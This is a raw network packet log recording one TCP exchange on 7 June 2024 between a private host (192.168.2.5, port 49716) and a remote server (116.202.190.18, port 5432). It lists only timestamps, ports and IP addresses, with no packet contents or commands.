Jun 7, 2024 17:21:17.299460888 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.299509048 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.300281048 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.300309896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.300340891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.300364017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.300791025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.300839901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.300844908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.300880909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.300930023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.300930023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.300934076 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.300970078 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.300985098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.301064014 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302088022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302115917 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302165985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302165985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302170038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302201033 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302234888 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302251101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302251101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302339077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302669048 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302697897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302732944 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302745104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302745104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302814007 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302815914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302849054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.302886009 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.302891970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.303749084 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.303802013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.303806067 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.303834915 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.303880930 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.303880930 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.304835081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.304867029 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.304898024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.304902077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.304920912 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.304936886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.304971933 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.304995060 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.305270910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.305346966 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.305419922 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.305474043 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.305474997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.305526972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.305531025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.305560112 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.305588961 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.305608988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.305900097 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.305998087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.306027889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.306046963 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.306046963 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.306062937 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.306075096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.306097031 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.306126118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.306195021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.306652069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.306704044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.306713104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.306734085 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.306766987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.306772947 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.306772947 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.306812048 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.307817936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.307847023 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.307878017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.307898045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.307903051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.307928085 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.307941914 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.307970047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.308638096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.308666945 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.308701038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.308717966 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.308717966 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.308734894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.308780909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.308780909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.308845997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.308876038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.308924913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.308924913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.309715986 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.309746981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.309781075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.309796095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.309796095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.309827089 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.309834003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.309869051 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.309894085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.309902906 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.309931040 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.309937000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.309964895 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.309990883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.310497046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.310525894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.310563087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.310576916 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.310606003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.310625076 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.310626030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.310656071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.310657978 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.310689926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.310719013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.310724974 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.310775042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.310775042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.311381102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.311414003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.311443090 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.311464071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.311470032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.311500072 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.311528921 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.311533928 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.311583042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.311583042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.312412977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.312442064 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.312505960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.312505960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.312513113 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.312550068 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.312583923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.312597990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.312597990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.312644005 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.313323975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.313357115 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.313390970 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.313401937 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.313402891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.313477039 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.313983917 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.314013004 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.314047098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.314127922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.314306021 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.314359903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.314363956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.314390898 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.314424992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.314433098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.314433098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.314460039 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.314485073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.314519882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.315088987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.315118074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.315148115 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.315170050 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.316035032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.316067934 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.316111088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.316111088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.316121101 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.316154957 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.316190004 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.316195011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.316195011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.316222906 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.316257000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.316270113 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.316270113 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.316335917 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.317015886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317044973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317065954 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.317095995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317101955 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.317131042 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317164898 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317178965 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.317178965 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.317229033 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.317801952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317830086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317852974 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.317883015 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317883968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.317910910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.317938089 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.318025112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.318660975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.318715096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.318726063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.318747997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.318793058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.318793058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.318909883 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.318939924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.318993092 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.318994999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.318994999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.319025993 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.319058895 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.319061041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.319083929 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.319154024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.319643021 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.319673061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.319705009 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.319786072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.320787907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.320816994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.320863962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.320868969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.320883036 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.320902109 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.320934057 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.320950985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.320950985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.320987940 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.321649075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.321702957 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.321717978 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.321837902 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.321912050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.321945906 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.321980000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.321983099 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.321995020 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.322077990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.322321892 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.322351933 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.322390079 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.322395086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.322402000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.322436094 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.322468996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.322483063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.322483063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.322518110 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.322808981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.322875023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323220015 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323288918 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323307991 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323338032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323381901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323381901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323390961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323424101 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323452950 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323453903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323487997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323503971 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323503971 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323523045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323556900 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.323561907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323579073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.323637962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.324096918 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.324131966 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.324165106 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.324171066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.324182034 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.324238062 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.324827909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.324856997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.324898005 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.324903011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.324944973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.324944973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.324958086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.325009108 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.325043917 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.325062037 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.325062037 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.325073957 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.325120926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.325120926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.325786114 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.325814962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.325844049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.325900078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.325969934 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.325999022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.326050997 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.326087952 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.326642990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.326670885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.326699972 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.326725006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.326752901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.326757908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.326792002 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.326797009 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.326818943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.326843023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.327491045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.327526093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.327559948 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.327567101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.327567101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.327622890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.328439951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.328476906 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.328520060 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.328540087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.328551054 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.328574896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.328609943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.328620911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.328620911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.328643084 CEST	5432	49716	116.202.190.18	192.168.2.5
